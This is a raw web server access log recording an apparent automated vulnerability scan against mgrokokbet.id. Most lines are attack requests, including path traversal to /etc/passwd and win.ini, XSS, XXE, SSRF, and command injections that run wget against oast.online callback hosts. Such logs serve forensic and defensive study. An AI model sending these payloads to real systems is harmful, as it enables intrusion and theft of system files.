/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 1242 "mgrokokbet.id/user/register" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:17:11 -0400] "GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:03:18:47 -0400] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.17" 154.84.62.234 - - [24/Apr/2025:03:19:05 -0400] "POST /webtools/control/xmlrpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:19:56 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:21:43 -0400] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:03:21:48 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:22:42 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:23:30 -0400] "GET /?echo+luSNeuRzEl HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" 154.84.62.234 - - [24/Apr/2025:03:24:46 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:25:42 -0400] "POST 
/ws_utc/resources/setting/options HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.17" 154.84.62.234 - - [24/Apr/2025:03:25:46 -0400] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:26:53 -0400] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:26:56 -0400] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0" 154.84.62.234 - - [24/Apr/2025:03:27:01 -0400] "GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:03:27:08 -0400] "GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" 154.84.62.234 - - [24/Apr/2025:03:27:29 -0400] "POST /timesheet/login.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:28:01 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - admin [24/Apr/2025:03:28:53 -0400] "POST /checkValid HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:33:55 -0400] "GET /wan.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:34:29 -0400] "POST /NateMail.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0" 154.84.62.234 - - [24/Apr/2025:03:35:21 -0400] "GET /whoAmI/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:03:35:26 -0400] "GET /whoAmI/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:37:26 -0400] "POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.3" 154.84.62.234 - - [24/Apr/2025:03:37:33 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.21" 154.84.62.234 - - [24/Apr/2025:03:37:42 -0400] "POST /share/page/dologin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:37:45 -0400] "POST /config/pw_snmp_done.html HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:03:37:50 -0400] "GET /config/pw_snmp.html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:03:37:56 -0400] "GET / HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" 154.84.62.234 - - [24/Apr/2025:03:38:07 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:38:14 -0400] "POST /Collector/diagnostics/ping HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:38:22 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:03:38:27 -0400] "POST /Collector/diagnostics/trace_route HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:03:38:29 -0400] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:38:33 -0400] "GET /crowd/plugins/servlet/exp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:41:03 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:03:42:56 -0400] "POST /password_change.cgi HTTP/1.1" 403 1242 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:44:05 -0400] "POST /rpc.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id/sysinfo.cgi?xnavigation=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:44:05 -0400] "POST /rpc.cgi HTTP/1.1" 200 0 
"https://mgrokokbet.id/sysinfo.cgi?xnavigation=1" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:44:05 -0400] "POST /session_login.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:03:44:05 -0400] "POST /session_login.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:44:06 -0400] "GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:03:49:07 -0400] "GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:49:23 -0400] "POST /api/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:49:38 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:49:43 -0400] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:49:46 -0400] "GET /talari/app/files/2w9rfeW1tco1oeRmskBpFusDWdI HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:03:50:36 -0400] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 
200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:03:51:13 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:03:51:15 -0400] "GET /wp-content/plugins/checklist/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" 154.84.62.234 - - [24/Apr/2025:03:53:57 -0400] "POST /wp-json/visualizer/v1/update-chart HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.7.15" 154.84.62.234 - - [24/Apr/2025:03:54:03 -0400] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.54" 154.84.62.234 - - [24/Apr/2025:03:55:19 -0400] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:55:20 -0400] "GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:58:25 -0400] "POST /getcfg.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:58:26 -0400] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:59:07 -0400] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - 
[24/Apr/2025:03:59:14 -0400] "GET /zabbix.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" 154.84.62.234 - - [24/Apr/2025:03:59:14 -0400] "GET /zabbix/zabbix.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:59:14 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:00:38 -0400] "POST /admin/auth/reset-password HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - admin [24/Apr/2025:04:00:47 -0400] "POST /boafrm/formSysCmd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:04:06:13 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:04:08:02 -0400] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22" 154.84.62.234 - - [24/Apr/2025:04:10:50 -0400] "POST /dashboard/uploadID.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:10:55 -0400] "GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//d04qr7ij4pq19d75k490d54xw3nf6pxux.oast.online/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - 
[24/Apr/2025:04:11:23 -0400] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:04:11:25 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:12:37 -0400] "POST /servlet/UploadServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:12:42 -0400] "GET /test.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:13:06 -0400] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:13:41 -0400] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 200 0 "mgrokokbet.id" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:04:15:44 -0400] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://d04qr7ij4pq19d75k490zrcg6c6yryf4b.oast.online%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:04:15:44 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:15:46 -0400] "POST /apply_sec.cgi HTTP/1.1" 403 1242 "https://mgrokokbet.id/login_pic.asp" "Mozilla/5.0 (Fedora; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:04:15:48 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 
"https://mgrokokbet.id/login_pic.asp" "Mozilla/5.0 (X11; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:04:16:00 -0400] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.4.16" 154.84.62.234 - - [24/Apr/2025:04:16:23 -0400] "POST /node/1?_format=hal_json HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:04:16:34 -0400] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0" 154.84.62.234 - - [24/Apr/2025:04:17:06 -0400] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://d04qr7ij4pq19d75k4906hgtc8s4ttcht.oast.online) HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:04:17:27 -0400] "POST /pandora_console/index.php?login=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:17:27 -0400] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:17:30 -0400] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:04:17:30 -0400] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" 154.84.62.234 - - [24/Apr/2025:04:18:06 -0400] "GET 
/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET /pma/index.php?pma_servername=d04qr7ij4pq19d75k490aoe3g5agay86h.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET /pmd/index.php?pma_servername=d04qr7ij4pq19d75k490niiwtzwcwoakt.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1\x0920.51" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET /index.php?pma_servername=d04qr7ij4pq19d75k4904eyfs15dzsqrp.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET /_phpmyadmin/index.php?pma_servername=d04qr7ij4pq19d75k490x1h5z3f579rbh.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET /phpmyadmin/index.php?pma_servername=d04qr7ij4pq19d75k490i43j7izmgk3zn.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET 
/phpMyAdmin/index.php?pma_servername=d04qr7ij4pq19d75k4901usho8ip64xiu.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 34.226.89.140 - - [24/Apr/2025:04:19:32 -0400] "GET /info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:20:23 -0400] "POST /service/extdirect HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:04:21:18 -0400] "POST /photo/p/api/album.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:21:26 -0400] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:04:21:29 -0400] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:04:23:07 -0400] "POST /cgi-bin/supportInstaller HTTP/1.1" 403 1242 "-" "MSIE" 154.84.62.234 - - [24/Apr/2025:04:23:21 -0400] "POST /adxmlrpc.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:23:25 -0400] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.17 (KHTML, like Gecko) Version/17.3.75 Safari/616.17" 154.84.62.234 - - [24/Apr/2025:04:25:10 -0400] "POST /api/timelion/run HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 
14) AppleWebKit/616.19.3 (KHTML, like Gecko) Version/17.6.11 Safari/616.19.3" 154.84.62.234 - - [24/Apr/2025:04:27:28 -0400] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.22" 154.84.62.234 - - [24/Apr/2025:04:27:31 -0400] "POST /_async/AsyncResponseService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:27:34 -0400] "GET /_async/favicon.ico HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:31:24 -0400] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20HXIRgOCoHP.txt%60 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" 154.84.62.234 - - [24/Apr/2025:04:31:28 -0400] "GET /HXIRgOCoHP.txt HTTP/1.1" 200 0 "-" 